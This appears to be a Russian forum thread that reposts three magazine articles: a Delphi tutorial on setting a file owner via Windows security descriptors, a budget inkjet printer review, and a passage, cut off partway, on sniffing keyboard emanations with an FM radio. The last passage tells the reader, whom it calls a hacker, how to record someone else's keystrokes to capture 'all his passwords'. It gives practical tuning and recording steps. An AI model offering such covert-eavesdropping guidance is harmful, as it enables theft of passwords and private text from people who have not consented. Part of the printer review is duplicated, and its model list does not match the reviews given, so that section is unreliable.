Начнем рассмотрение темы с самого конца, а именно – с функции создания файла или директории. У обеих функций есть одинаковый параметр – указатель на структуру SECURITY_ATTRIBUTES. У функции CreateFile этот указатель четвертый по счету, а у CreateDirectory – второй. Как я уже сказал, в большинстве случаев это поле просто игнорируют, но давайте посмотрим, как его можно корректно заполнить.

Что это за структура? Она определяет атрибуты безопасности и состоит всего из трех полей:

КОД

PSecurityAttributes = ^TSecurityAttributes;

_SECURITY_ATTRIBUTES = record

nLength: DWORD;

lpSecurityDescriptor: Pointer;

bInheritHandle: BOOL;

end;

Первое поле определяет размер структуры. Подобные поля можно встретить в большинстве WinAPI-структур. Второе поле – указатель на дескриптор безопасности. Третий параметр – булевое значение, которое определяет, может ли полученный указатель наследоваться дочерними процессами. Наследование дескрипторов нас не интересует и выходит за рамки этой статьи, поэтому в примере, который мы будем рассматривать, установим это значение в false.

Самое интересное — это второй параметр, на котором следует заострить особое внимание. Это указатель на дескриптор безопасности, который на самом деле ничего страшного собой не представляет.

Дескриптор безопасности

Для каждого объекта ОС создает дескриптор безопасности, по которому определяется права доступа к объекту, его владелец, группа, а также списки SACL (System Access Control List) и DACL (Discretionary Access Control List). Мы рассматриваем программирование, поэтому сделаем упор на рассмотрение самих функций. Если тебя интересует теория безопасности ОС Windows, то следует почитать книжку из серии для админов. Я думаю, там должна быть освещена эта тема.

Итак, давай посмотрим, что такое дескриптор, с точки зрения программирования. На самом деле, это структура, которая имеет следующий вид:

КОД

PSecurityDescriptor = ^TSecurityDescriptor;

_SECURITY_DESCRIPTOR = record

Revision: Byte;

Sbz1: Byte;

Control: SECURITY_DESCRIPTOR_CONTROL;

Owner: PSID;

Group: PSID;

Sacl: PACL;

Dacl: PACL;

end;

В файле помощи эта структура описана только общими словами. Из чего она состоит, можно определить только по заголовочному файлу windows.pas.

Давай рассмотрим, что представляют собой эти поля. Это позволит нам лучше понять дескриптор и его работу.

Revision – ревизия. Этот параметр должен быть равен единице, а лучше использовать константу SECURITY_DESCRIPTOR_REVISION. На одном из сайтов (не российских, потому что в рунете я нормального описания этой темы не видел) утверждается, что можно указывать еще константу SECURITY_DESCRIPTOR_REVISION1 — мол, она предоставляет доступ к новым возможностям. Уверяю тебя, что это полный бред, потому что обе константы в файле windows.pas равны 1, то есть идентичны

Sbz1 – этот параметр не используется и должен быть равен нулю (предназначен только для выравнивания).

Control – это поле имеет тип данных Word и содержит флаги.

Owner – идентификатор безопасности SID владельца.

Group – идентификатор безопасности SID группы.

SAcl – указатель на SACL;

DAcl – указатель на DACL;

Работа с дескриптором

Несмотря на то, что дескриптор безопасности легко описать в виде структуры, работать с ним напрямую не рекомендуется. Наверное, поэтому его не описывают в файле справки. Почему нежелателен прямой доступ к полям? Дело в том, что дескриптор может хранить данные непосредственно, а может просто содержать указатель на данные.

Вместо прямого доступа необходимо использовать специализированные функции. Этих функций предостаточно, но мы остановимся на трех из них: инициализация, установка владельца объекта и установка группы. Да, данной структуре необходима инициализация, ведь она может хранить указатели на данные, а любой указатель требует выделения памяти.

Для инициализации дескриптора безопасности используем WinAPI-функцию

initializeSecurityDescriptor, которая выглядит следующим образом:

КОД

function InitializeSecurityDescriptor(

pSecurityDescriptor: PSecurityDescriptor;

dwRevision: DWORD

): BOOL; stdcall;

Тут у нас два параметра: указатель на дескриптор безопасности, который нужно инициализировать и номер ревизии. Как мы уже выяснили, ревизия должна быть равна константе SECURITY_DESCRIPTOR_REVISION.

Чтобы установить владельца, используется функция SetSecurityDescriptorOwner, которая выглядит следующим образом:

КОД

function SetSecurityDescriptorOwner(

pSecurityDescriptor: PSecurityDescriptor;

pOwner: PSID;

bOwnerDefaulted: BOOL

): BOOL; stdcall;

Тут три параметра:

- дескриптор, владельца объекта которого нужно изменить;

- указатель на SID пользователя, которого мы хотим установить в качестве владельца;

- нужно ли использовать владельца по умолчанию. Если этот параметр равен true, то владельца назначит ОС в соответствии со своими правилами. А правило простое: создатель становится и владельцем.

Для установки группы используем функцию SetSecurityDescriptorGroup, которая выглядит так:

КОД

function SetSecurityDescriptorGroup(

pSecurityDescriptor: PSecurityDescriptor;

pGroup: PSID;

bGroupDefaulted: BOOL

): BOOL; stdcall;

Функция очень похожа на установку владельца. Тут у нас опять три параметра, которые имеют схожее с функцией SetSecurityDescriptorOwner назначение:

- дескриптор, группу объекта которого нужно изменить;

- указатель на SID группы, которую мы хотим установить в качестве владельца;

- нужно ли использовать группу по умолчанию, то есть понадеяться на ОС.

SID

Списки доступа SACL и DACL пока опустим и не будем с ними заморачиваться, так как это тема отдельной статьи. Сейчас нас интересуют владелец и группа, но, чтобы их установить, необходимо знать соответствующий SID. Да, мы всегда можем использовать значение по умолчанию, которое предоставляет ОС, но определить SID не так уж и сложно. Для этого нужна всего одна функция – LookupAccountName, которая по имени пользователя возвращает идентификатор безопасности SID.

В общем виде функция выглядит следующим образом:

КОД

function LookupAccountName(

lpSystemName,

lpAccountName: PChar;

Sid: PSID;

var cbSid: DWORD;

ReferencedDomainName: PChar;

var cbReferencedDomainName: DWORD;

var peUse: SID_NAME_USE

): BOOL; stdcall;

Давай рассмотрим параметры этой функции:

lpSystemName – имя системы. Если этот параметр нулевой, то мы ищем локального пользователя, если нужен SID удаленного пользователя, то необходимо указать здесь имя этой машины;

lpAccountName – имя пользователя, идентификатор которого нам нужен;

Sid – указатель на память, куда будет записан результат;

cbSid – длина буфера, которую мы выделили для параметра Sid, то есть для хранения результирующего идентификатора;

ReferencedDomainName – имя домена;

cbReferencedDomainName – длина буфера ReferencedDomainName;

peUse – переменная типа enum, которая определяет тип учетной записи. Здесь может быть одно из следующих значений:

- SidTypeUser – пользовательский SID;

- SidTypeGroup – SID группы;

- SidTypeDomain - SID доменной учетной записи;

- SidTypeAlias – псевдоним;

- SidTypeDeletedAccount - удаленная учетная запись;

- SidTypeInvalid – некорректный тип;

- SidTypeUnknown – тип неизвестен;

- SidTypeComputer – идентификатор компьютера.

Что такое SID?

Что такое SID хорошо иллюстрирует заголовочный файл windows.pas. Запускаем поиск по трем магическим буквам (нет, не по тем буквам, которые пишутся на заборе, а по SID) и натыкаемся на табличку, которую ты можешь увидеть где-то рядом с этим текстом.

Нетрудно догадаться, что на самом деле SID - это структура, которая состоит из:

SubAuthorityCount – количество записей SubAuthority;

Revision – версия, в ней используются только четыре бита, остальные зарезервированы;

IdentifierAuthority – структура, которая хранит идентификатор SID;

SubAuthority – массив относительных идентификаторов;

Структура IdentifierAuthority имеет следующий вид:

_SID_IDENTIFIER_AUTHORITY = record

Value: array[0..5] of Byte;

end;

Банальный массив из пяти байт.

Прямая работа с SID нежелательна. Для манипулирования этой структурой в WinAPI есть все необходимые функции — лучше использовать их. Но это уже отдельная история, а я итак уже не укладываюсь во временные и объемные рамки.

Определение SID

Обрати внимание, что функции LookupAccountName, которую мы только что рассмотрели, необходимо передать указатель на память для хранения идентификатора SID и указать размер. Проблема в том, что нет четко определенного размера идентификатора. Сколько же тогда памяти выделять для хранения результата?

Это легко определить. Достаточно вызвать функцию LookupAccountName, указав в качестве указателя на буфер для хранения SID и в качестве размера буфера нулевое значение. В результате функция вернет ошибку и сообщит, что недостаточно памяти в буфере. А через параметры cbSid и cbReferencedDomainName вернет нам корректные значения необходимых буферов. Теперь мы знаем все необходимое.

Пример

Теперь посмотрим, как можно использовать все вышесказанное на практике. Для этого я создал банальную форму с одной только кнопкой, по нажатию которой необходимо написать код из листинга 1. Код снабжен комментариями, а все используемые функции мы уже подробно рассмотрели, поэтому с их пониманием не должно возникнуть проблем.

Данный пример создает файл, а, чтобы создать файл с использованием дескриптора безопасности, можно заменить последнюю строку с вызовом функции CreateFile на:

CreateDirectory('c:\Directoryname', @securityAttributes);

Итого

Тема безопасности Windows и работы с ее списками и идентификаторами очень интересная, и, возможно, мы еще вернемся к этой теме в ближайшее время и расскажем тебе что-то новое. На этом могу только откланяться. Удачного кодинга!

Создание объектов с явным заданием владельца и группы

procedure TForm1.Button1Click(Sender: TObject);

var

securityAttributes: TSecurityAttributes;

securityDescriptor: TSecurityDescriptor;

sidLength, sidLengthDomain: Cardinal;

sidType: SID_NAME_USE;

sidValue: PSID;

domain:PChar;

begin

// Обнуляем длину буферов, чтобы определить корректный размер

sidLength := 0;

sidLengthDomain := 0;

// Первый вызов завершиться ошибкой, но вернет размер данных

LookupAccountName(nil, 'flenov', nil, sidLength, nil, sidLengthDomain, sidType);

// Выделяем память для идентификатора имени и домена

sidValue := AllocMem(sidLength);

domain := AllocMem(sidLengthDomain);

// На этот раз мы определим SID

if (LookupAccountName(nil, 'flenov', sidValue, sidLength, domain, sidLengthDomain, sidType)=false) then

exit;

// Инициализация дескриптора

InitializeSecurityDescriptor(@securityDescriptor, SECURITY_DESCRIPTOR_REVISION);

// Устанавливаем полученный SID владельцу и группе

SetSecurityDescriptorOwner(@securityDescriptor, sidValue, false);

SetSecurityDescriptorGroup(@securityDescriptor, nil, true);

securityAttributes.nLength := sizeof(securityAttributes);

securityAttributes.lpSecurityDescriptor := @securityDescriptor;

securityAttributes.bInheritHandle:=false;

// Создаем файл на основе своего дескриптора безопасности

CreateFile('e:\test.txt', GENERIC_ALL, 0, @securityAttributes,

CREATE_ALWAYS, FILE_FLAG_BACKUP_SEMANTICS, 0);

end;



Автор: Metallica Nov 23 2006, 11:44

Печатные машинки

Бюджетные принтеры для дома

test_lab выражает благодарность за предоставленное оборудование российским представительствам компаний HP, Canon, Lexmark и Epson.

Список тестируемого оборудования:

Lexmark Z735

Lexmark P915

Canon Pixma IP1600

Canon Pixma IP2200

Canon Pixma IP4200

Epson С48

Epson С67

Epson Stylus C67 Photo Edition

HP Deskjet 3940

HP Deskjet 5443

HP Deskjet 5943

Закончилась сессия, а с ней и многие вещи, которые требовали вмешательства принтера: печать курсовых, рефератов, докладов и прочих составляющих насыщенной студенческой жизни. Вроде бы, печатающие головки могут отдохнуть от расставания с чернилами, а каретка, уставшая бегать туда-сюда, тоже имеет право на временную передышку. Но не тут-то было! Скоро осень, которая принесет с собой пересдачу «хвостов», новый семестр, требующий «аккуратного оформления работ» и так далее. Но и летом, в неучебную пору, принтеру может найтись работенка: распечатать какой-нибудь документ, схему, слайд или диаграмму, но чаще — фотки с последней попойки.

Хочется иметь устройство, которое бы круглый год радовало хорошим качеством отпечатков. Сегодня мы протестировали доступные универсальные принтеры, которые подходят для всех типичных домашних задач, возникающих обычно у школьников, студентов и их родителей. Эти устройства качественные, надежные, недорогие, пригодны даже для печати фотографий.

Методика тестирования

Вначале на каждом принтере выводилась его собственная тестовая страница. Для проверки базовых функций печати нами использовалась специальная тестовая страница, состоящая из наиболее часто встречающихся элементов: текста (разного размера, толщины и наклона), таблицы, диаграммы и картинки. Эта страница выводилась при помощи Microsoft Word на дефолтных настройках качества на обычной бумаге. Большинство принтеров нашего обзора были оснащены фотокартриджами. Тестовая фотография (размер стандартный (10х15), человек — на переднем плане, ночная улица — на заднем, много ярких цветов для проверки естественности цветопередачи) распечатывалась на фотобумаге из программы ACDSee 8 с выставлением в настройках принтера максимального качества отпечатка. В обоих случаях засекалось время с момента нажатия кнопки Print и до полного завершения процесса печати.

Оценивались качество полученных фоток, четкость, яркость цветов, зернистость и естественность передачи цветов. Мы также обращали внимание и на удобство работы с ними (механизм подачи, замена картриджа, возможности ПО и так далее).

Lexmark Z735

7 баллов

Цена, $: 60

Максимальное разрешение, dpi: 4800х1200

Максимальная скорость цветной печати, стр\мин: 15

Максимальная скорость монохромной печати, стр\мин: 15

Емкость лотка для бумаги, шт: 100

Дополнительно: ПО для работы с изображениями в комплекте поставки

Интерфейс: USB

Габариты, мм: 157x377x224

Вес, кг: 2,3

Очень простое и компактное устройство, которое не займет много места на столе и хорошо справится с несложными домашними задачами. Сам по себе принтер очень прост – на нем имеются всего две кнопки управления: включение питания и выдача бумаги. Кстати, ею в процессе тестирования пользоваться не приходилось: бумага подавалась ровно и не мялась на выходе. С принтером поставляется удобное и несложное фирменное ПО, предназначенное для работы с изображениями. Тестовая страница распечаталась довольно быстро (43 с). Фотография получилась на удивление качественной.

Хотя и печаталась долго (2,5 мин.). «На удивление» – потому что этот принтер не поддерживает фотопечать и во всех задачах обходится одним картриджем. В общем, это удобно. Как уже говорилось выше, тестовая страница распечаталась быстро, но это оказалось единственным достоинством, которое принтер показал в данном испытании. Картинка на ней была блеклой, текст был не черного, а какого-то болотно-зеленого цвета. Четкость — ниже средней.

Lexmark P915

9 баллов

Цена, $: 120

Максимальное разрешение, dpi: 4800х1200

Максимальная скорость цветной печати, стр\мин: 15

Максимальная скорость монохромной печати, стр\мин: 22

Емкость лотка для бумаги, шт: 100

Дополнительно: поддержка интерфейса PictBridge, ЖК-экран, автономная печать с карт памяти форматов CompactFlash I/II, Memory Stick, Multi Media, Secure Digital, SmartMedia, Microdrive, xD

Интерфейс: USB

Габариты, мм: 150x428x237

Вес, кг: 3,5

Гораздо более функциональная модель. Lexmark P915 оснащен фотокартриджем, что существенно повышает его возможности и качество отпечатков. Кроме того, работа с фотографиями может осуществляться и автономно, без ПК – через интерфейс PictBridge или с помощью карт памяти. Посредством встроенного ЖК-экрана можно легко управлять настройками устройства, а также просматривать и редактировать фотографии. Тут, несмотря на простоту и удобство меню, пригодится полная русификация принтера: от драйверов (которые, как и у предыдущего устройства, дублируют голосом экранные сообщения) до надписей на корпусе. Тестовая страница распечаталась четко и качественно, правда, не за рекордное время (1 минута и 9 секунд). Работа над фотографией заняла минуту и 20 секунд. Качество приемлемое, хотя задний план мог бы быть пропечатан четче, а цвета — понасыщеннее. При работе наблюдался неприятный момент: довольно часто страницы и фотографии печатались не полностью, наполовину или на треть. Решалась проблема сама собой: путем несколько раз повторенного задания на печать. Возможно, проблема решится обновлением драйверов.

Canon PIXMA iP1600

6 баллов

Цена, $: 75

Максимальное разрешение, dpi: 4800х1200

Максимальная скорость цветной печати, стр\мин: 16

Максимальная скорость монохромной печати, стр\мин: 19

Емкость лотка для бумаги, шт: 100

Дополнительно: ПО для работы с изображениями в комплекте поставки

Интерфейс: USB

Габариты, мм: 435x249x165

Вес, кг: 2,9

Еще один очень простой в освоении и обращении принтер. Имеет всего пару управляющих клавиш: для включения питания и выдачи застрявшего бумажного листа. Что очень понравилось в этой модели, так это скорость ее работы. Тестовая страница была распечатана за каких-то 25 секунд. Причем качество текста, таблицы и диаграммы не вызывает нареканий: все четкое и читабельное. В общем, для школьника-студента, который ищет приемлемую по цене модель для распечатки рефератов – самое то.
А вот качество фотографий в обоих тестах оказалось низким. На тестовой странице цвета были не очень насыщенными. Фотография не выдерживает вообще никакой критики – по всей распечатке проходят широкие горизонтальные полосы. Хотя основное преимущество модели сохранено и тут: печать фотографии отняла всего 45 секунд. Это даже меньше, чем указано на наклейке!

Canon PIXMA iP2200

7 баллов

Цена, $: 110

Максимальное разрешение, dpi: 4800х1200

Максимальная скорость цветной печати, стр\мин: 17

Максимальная скорость монохромной печати, стр\мин: 22

Емкость лотка для бумаги, шт: 100

Дополнительно: ПО для работы с изображениями в комплекте поставки

Интерфейс: USB

Габариты, мм: 435x263x165

Вес, кг: 2,9

Более производительная модификация предыдущей модели, обладающая к тому же более высоким качеством печати. Дизайн этих принтеров абсолютно идентичен, разве что Canon PIXMA iP2200 чуть больше, хотя это и незаметно. Набор прилагаемого программного обеспечения также одинаков, так как драйвера унифицированы вместе с утилитами. Зато основной козырь iP1600 тут сохранился и даже улучшился – скорость печати очень высока. Тестовая страница была выдана за 23 секунды, причем качество текста осталось столь же высоким, а качество картинки несколько выросло: она стала более четкой, насыщенной и естественной. Кардинально улучшился отпечаток на фотобумаге – теперь никаких полос нет и в помине. В общем, очень грамотно усовершенствованная базовая модель.

К сожалению, все проблемы не решены. И дело тут опять в картинках: по сравнению с отпечатками, сделанными другими моделями, качество цветопередачи явно ниже. Поэтому мы рекомендуем обе эти модели тем, кто печатает фотки редко.

Canon Pixma IP4200 (Выбор редакции)

9 баллов

Цена, $: 130

Максимальное разрешение, dpi: 9600 х 2400

Максимальная скорость цветной печати, стр\мин: 10

Максимальная скорость монохромной печати, стр\мин: 15

Емкость лотка для бумаги, шт: 100

Дополнительно: DirectPrint, PictBridge, печать на CD и DVD

Интерфейс: USB

Габариты, мм: 419x299x160

Вес, кг: 6,5

Довольно большое по размерам, но в то же время очень функциональное устройство. Помимо того, что оно быстро и очень качественно распечатало нашу тестовую страницу (23 с.) и фотографию (25 с.), в его активе есть возможность печати на оптических носителях, а также прямая печать с камер и фотоаппаратов (интерфейс PictBridge). Не стоит также забывать и про два лотка подачи бумаги и встроенное устройство для автоматической двусторонней печати – теперь тебе не придется вручную переворачивать и перекладывать странички. Компания Canon призывает использовать для печати только свои картриджи и бумагу – в этом случае, благодаря специальным технологиям, нас поразит качество отпечатков и долговечность их хранения. Как уже было сказано выше, качество отпечатков отличное, никаких нареканий оно не вызывает. В общем, это хорошее и универсальное устройство.

Цена немного выше, чем у остальных устройств из обзора. Так же, как и габариты изделия.

Epson Stylus C48

6 баллов

Цена, $: 90

Максимальное разрешение, dpi: 2880x720

Максимальная скорость цветной печати, стр\мин: 6

Максимальная скорость монохромной печати, стр\мин: 12

Емкость лотка для бумаги, шт: 100

Дополнительно: ПО для работы с изображениями в комплекте поставки

Интерфейс: USB

Габариты, мм: 419x203x167,4

Вес, кг: 3

Epson Stylus C48 прост в обращении и имеет в комплекте поставки утилиты, облегчающие печать изображений. Хотя, основной его талант – это распечатка текстовых материалов. С тестовой страницей он справился удовлетворительно, особенно с таблицей и диаграммой — они получились яркие и четкие. С текстом дело обстоит немного хуже, но в общем он довольно неплох.

Только самый маленький шрифт несколько размыт. С фотографиями хуже: цвета передаются неестественно. При печати фотки заметны горизонтальные полосы. Но происходит распечатка всего за 48 секунд. Стоит обратить особое внимание на настройки качества печати: уровень «тест+графика» (при котором мы и работали) выдает неплохой результат, но занимает этот процесс 3 минуты 30 секунд – именно столько печаталась тестовая страница. А на уровне качества «текст» работать почти невозможно: буквы размытые и нечеткие, видны непропечатанные полосы.

Epson Stylus C67 Photo Edition

8 баллов

Цена, $: 110

Максимальное разрешение, dpi: 5760x1440

Максимальная скорость цветной печати, стр\мин: 10

Максимальная скорость монохромной печати, стр\мин: 17

Емкость лотка для бумаги, шт: 100

Дополнительно: ПО для работы с изображениями в комплекте поставки

Интерфейс: USB

Габариты, мм: 447x240x195

Вес, кг: 4

Более совершенная модель от компании Epson, полностью оправдывающая свою приставку к названию – Photo Edition. Напечатав тестовую страницу за минуту и 55 секунд, он воспроизвел находящуюся на ней графическую информацию одним из лучших в обзоре – все цвета были естественными, насыщенными и яркими. С текстом тоже проблем не наблюдалось: четкий и совершенно читабельный, полное отсутствие артефактов. Но по-настоящему этот принтер проявил себя, когда добрался до фотографии на специальной бумаге. Во-первых, он справился с задачей всего за 45 секунд. Во-вторых, за это время была напечатана очень качественная фотография, на которой нам понравилась естественность цветопередачи.

К недостаткам обоих принтеров Epson, помимо уже написанного выше, нужно отнести их дизайн и темную расцветку корпусов, что вкупе делает принтеры оптически более громоздкими. Понятно, что для дома это не самое лучшее. Также стоит отметить повышенную зависимость качества изображения от настроек драйверов. Данная особенность была замечена только у этих принтеров. Для дома чем проще, тем лучше.

Epson С87

7 баллов

Цена, $: 90

Максимальное разрешение, dpi: 5760x1440

Максимальная скорость цветной печати, стр\мин: 12

Максимальная скорость монохромной печати, стр\мин: 22

Емкость лотка для бумаги, шт: 120

Дополнительно: ПО для работы с изображениями в комплекте поставки

Интерфейс: USB, EPP

Габариты, мм: 460х242х198

Epson Stylus C48

6 баллов

Цена, $: 90

Максимальное разрешение, dpi: 2880x720

Максимальная скорость цветной печати, стр\мин: 6

Максимальная скорость монохромной печати, стр\мин: 12

Емкость лотка для бумаги, шт: 100

Дополнительно: ПО для работы с изображениями в комплекте поставки

Интерфейс: USB

Габариты, мм: 419x203x167,4

Вес, кг: 3

Epson Stylus C48 прост в обращении и имеет в комплекте поставки утилиты, облегчающие печать изображений. Хотя, основной его талант – это распечатка текстовых материалов. С тестовой страницей он справился удовлетворительно, особенно с таблицей и диаграммой — они получились яркие и четкие. С текстом дело обстоит немного хуже, но в общем он довольно неплох.

Только самый маленький шрифт несколько размыт. С фотографиями хуже: цвета передаются неестественно. При печати фотки заметны горизонтальные полосы. Но происходит распечатка всего за 48 секунд. Стоит обратить особое внимание на настройки качества печати: уровень «тест+графика» (при котором мы и работали) выдает неплохой результат, но занимает этот процесс 3 минуты 30 секунд – именно столько печаталась тестовая страница. А на уровне качества «текст» работать почти невозможно: буквы размытые и нечеткие, видны непропечатанные полосы.

Epson Stylus C67 Photo Edition

8 баллов

Цена, $: 110

Максимальное разрешение, dpi: 5760x1440

Максимальная скорость цветной печати, стр\мин: 10

Максимальная скорость монохромной печати, стр\мин: 17

Емкость лотка для бумаги, шт: 100

Дополнительно: ПО для работы с изображениями в комплекте поставки

Интерфейс: USB

Габариты, мм: 447x240x195

Вес, кг: 4

Более совершенная модель от компании Epson, полностью оправдывающая свою приставку к названию – Photo Edition. Напечатав тестовую страницу за минуту и 55 секунд, он воспроизвел находящуюся на ней графическую информацию одним из лучших в обзоре – все цвета были естественными, насыщенными и яркими. С текстом тоже проблем не наблюдалось: четкий и совершенно читабельный, полное отсутствие артефактов. Но по-настоящему этот принтер проявил себя, когда добрался до фотографии на специальной бумаге. Во-первых, он справился с задачей всего за 45 секунд. Во-вторых, за это время была напечатана очень качественная фотография, на которой нам понравилась естественность цветопередачи.

К недостаткам обоих принтеров Epson, помимо уже написанного выше, нужно отнести их дизайн и темную расцветку корпусов, что вкупе делает принтеры оптически более громоздкими. Понятно, что для дома это не самое лучшее. Также стоит отметить повышенную зависимость качества изображения от настроек драйверов. Данная особенность была замечена только у этих принтеров. Для дома чем проще, тем лучше.

Epson С87

7 баллов

Цена, $: 90

Максимальное разрешение, dpi: 5760x1440

Максимальная скорость цветной печати, стр\мин: 12

Максимальная скорость монохромной печати, стр\мин: 22

Емкость лотка для бумаги, шт: 120

Дополнительно: ПО для работы с изображениями в комплекте поставки

Интерфейс: USB, EPP

Габариты, мм: 460х242х198


Вес, кг: 4,6

Epson С87 подойдет обладателям как современных, так и довольно древних компов, так как оснащен параллельным портом, чего не скажешь о других моделях теста. Кроме того, в нем есть и современный порт USB, так что с подключением проблем не будет. Тестовая страница была распечатана без каких-либо проблем, с неплохим качеством. Время работы составило 63 секунды. Распечатка фотографии заняла гораздо больше времени, 127 секунд, но к качеству особых претензий также нет, хороший средний уровень. Кроме того, если использовать чернила и бумагу Epson, то нам обещают, что отпечатки не выцветут, не смажутся и не расплывутся.

Габариты довольно велики, а дизайн устройства это только подчеркивает, такая серая громадина может не вписаться в интерьер.

HP Deskjet 3940 (Лучшая покупка)

6 баллов

Цена, $: 55

Максимальное разрешение, dpi: 4800х1200

Максимальная скорость цветной печати, стр\мин: 16

Максимальная скорость монохромной печати, стр\мин: 12

Емкость лотка для бумаги, шт: 80

Дополнительно: ПО для работы с изображениями в комплекте поставки

Интерфейс: USB

Габариты, мм: 470x197x244

Вес, кг: 2

Компактный и стильный принтер от компании HP, который радует своей простотой, небольшими размерами и удачным дизайном. Он хорошо подойдет для выполнения несложных, типичных задач печати. С тестовой страницей он справился неплохо – по качеству претензий почти нет, скорость вполне приемлемая, 40 секунд. Фотография печаталась полторы минуты. Результат неплохой. Неопытному пользователю понравится минимализм в органах управления – всего одна кнопка Power, и все. Запутаться негде и не в чем. Эффект красных глаз на фото корректируется автоматически.

Единственная проблема – с качеством фотографий. Как на простой бумаге, так и на фото, снимки были несколько невнятными – где-то не очень хорошая цветопередача, где-то видна горизонтальная полоса.

HP DeskJet 5443

7 баллов

Цена, $: 70

Максимальное разрешение, dpi: 4800x1200

Максимальная скорость цветной печати, стр\мин: 20

Максимальная скорость монохромной печати, стр\мин: 22

Емкость лотка для бумаги, шт: 100

Дополнительно: PictBridge

Интерфейс: USB

Габариты, мм: 459x220x169

Вес, кг: 3,5

HP Deskjet 5443 имеет увеличенную скорость печати (30 секунд на тестовую страницу и 80 на фотографию), улучшенную цветопередачу (изображения выглядят более четкими и насыщенными, живыми). В наличии — интерфейс PictBrige для прямой печати с совместимых устройств. В комплект поставки входит все необходимое для работы, включая трехцветный картридж. Если к нему добавить фирменную бумагу, то нам обещают столетнюю сохранность фотографий. Хочешь порадовать детей и внуков своими снимками?

К сожалению, все нововведения несколько увеличили габариты и вес устройства. На некоторых фотографиях проявлялись артефакты.

HP DeskJet 5943

8 баллов

Цена, $: 115

Максимальное разрешение, dpi: 4800x1200

Максимальная скорость цветной печати, стр\мин: 9

Максимальная скорость монохромной печати, стр\мин: 9

Емкость лотка для бумаги, шт: 100

Дополнительно: интерфейс PictBridge, ПО для работы с изображениями в комплекте поставки


Интерфейс: USB

Габариты, мм: 459x220x169

Вес, кг: 3,6

Старшая модель HP в нашем обзоре. От предыдущей отличается исключительно в лучшую сторону. Немного изменен дизайн и расцветка корпуса, в список возможностей добавлен интерфейс PictBridge, так что теперь фотки можно будет распечатывать без участия ПК. Как ни странно, но шум от печати стал еще меньше, нежели у предыдущей модели. «Странно» — потому что и там он уже был почти не слышан. В остальном же модели схожи, на правах старшего данный принтер выдал несколько более качественную фотку и тестовую страницу – четкий текст и яркие естественные цвета присутствуют.

Хотя сделан он это более медленно: тестовая страница отняла у него минуту и 11 секунд, а печать фотки заняла минуту. К сожалению, от недостатков – горизонтальных полос – этот принтер так и не смог избавиться.

Выводы

После того как мы распечатали все, что только можно на этих устройствах, мы можем смело сказать, что их покупка себя оправдывает. Несмотря на скромную цену, они достойно справятся с типичными домашними задачами (правда, кто-то быстрее и качественнее, а кто-то, соответственно, медленнее и похуже). Они даже напечатают неплохие фотки (но в этом случае не стоит рассчитывать на нечто сверхкачественное). «Выбором редакции» становится Canon Pixma IP4200 за свои богатые возможности и качество отпечатков. А «Лучшая покупка» достается HP DeskJet 3940!




Автор: Metallica Nov 30 2006, 13:04

Радиоснифер клавиатурыСвежий подход к перехвату набираемого на клавиатуре текста

Такой злостный хакерюга как ты, конечно, не раз общался с программными кейлогерами. Запустил один раз эту программку у неприятеля, и готово: все его пароли и набираемый текст, можно считать, уже у тебя. Однако у этого подхода есть недостаток: нужно каким-то образом запустить софтину на чужом компьютере, что не всегда возможно. Поэтому мы решили сделать элементарный девайс, при помощи которого ты сможешь легко логировать весь набираемый текст, просто подойдя поближе к компу неприятеля.

Суть и методы идеи

Вкратце объясню, о чем пойдет речь. Все токопотребляющие устройства, будь то телевизор, мышь, клавиатура, жесткий диск или кулер, во время работы создают в окружающем пространстве электромагнитное поле. Его возникновение, как известно из курса физики, напрямую связано с током разного напряжения, проходящим по проводам и каналам печатных плат. Величину этих электромагнитных колебаний можно измерить специальными приборами. Поле часто создает помехи в работе радиоприемников, телевизоров и другой техники. Ты, наверное, замечал, что поставленный вблизи телевизора FM-радиоприемник начинает хуже принимать каналы, сигнал в прямом смысле слова «забивается» посторонним излучением. Этот факт натолкнул меня на неплохую мысль: если телевизор засоряет сигнал, который "слушает" радиоприемник, то неплохо бы проверить, как это же сделает клавиатура. Ведь помехи, то есть электромагнитные импульсы, генерируемые ей, принадлежат, согласно справочникам, диапазону от 10 Гц и до 1000 МГц, а этот диапазон и является основным каналом утечки информации из современных ПК. Для работы я вооружился следующими инструментами:

1. Комп со звуковой картой

2. Дешевый китайский радиоприемник Fusun

3. Соединительный шнур для подключения FM-приемника к линейному входу звуковой карты

Что касается приемника, то он может быть любым (лучше - с ручной подстройкой частоты, так как поиск нужных помех - тонкая работа), главное - не использовать внутренний FM-тюнер, так как электромагнитные наводки внутри корпуса сведут на нет все попытки получить хоть какой-то результат. Шнур - стандартный, можно спаять самому из обрезков, оставшихся от старых сломанных наушников или микрофонов. На первых порах лучше подключить к выходу звуковой карты наушники и проводить все операции в них - так будут лучше слышны все нюансы шума. С помощью "sndvol32.exe" отрегулируй громкость записываемого сигнала по минимуму, предварительно выбрав в качестве источника записи линейный вход, иначе ты рискуешь оглохнуть, услышав дикий шум, выдаваемый радиоприемником. Подсоедини приемник к линейному входу и включи его питание. Вполне возможно, что вместо нужных нам шумов ты услышишь музыку, которую крутят на какой-нибудь FM-станции. В таком случае слегка покрути колесико регулировки частот, пока не услышишь "белый шум", как любят говорить физики. Далее твои действия должны выглядеть следующим образом: зажми любую кнопку клавиатуры и начинай очень осторожно подстраивать частоту, пока не услышишь характерный треск с частотой около 200 "трещаний" в минуту (или 3 в секунду). Если ты отпустишь кнопку клавиатуры, то треск должен прекратиться. Это верный знак того, что ты нашел нужную частоту. В некоторых случаях искомый сигнал может выглядеть как непрерывное, довольно низкое гудение, перемешанное с шумом, изменяющее свой тон при нажатии на кнопки клавиатуры. Если результат не приходит, то, вероятно, ты держишь приемник слишком близко к монитору. Особенно сильные помехи дает ЭЛТ-монитор. Если ты не можешь найти нужную частоту - отрегулируй длину внешней антенны радиоприемника.

Анализируем данные

Предположим, что ты нашел частоту, на которой помехи, создаваемые клавиатурой, слышны особенно хорошо. В таком случае ты сделал большую часть работы. Остается лишь записать помехи от различных нажатых клавиш, используя любой продвинутый wave-редактор, например Nero Wave Editor, и проанализировать их. Различия в волновой структуре звуковой формы помех, создаваемых клавиатурой, помогут нам разглядеть в неразберихе белого шума скан-коды нажатых клавиш smile.gif. Открывай звуковой редактор и начинай запись сигнала, подающегося с линейного входа, набирая на клавиатуре несложное слово, состоящее из 4-5 символов. Чтобы потом разглядеть на графическом изображении звуковой волны места, где обычный шум перемешан с помехами - "треском" клавиатуры, при записи сигнала лучше удерживать каждую клавишу подольше, хотя бы 0,5 секунд. Конечно, в реальной ситуации, когда ты будешь сканить чужую клавиатуру, никто не будет специально для тебя долго жать на кнопки, но наша задача сейчас - разобраться в методе, чтобы потом выполнять более сложные сканирования.

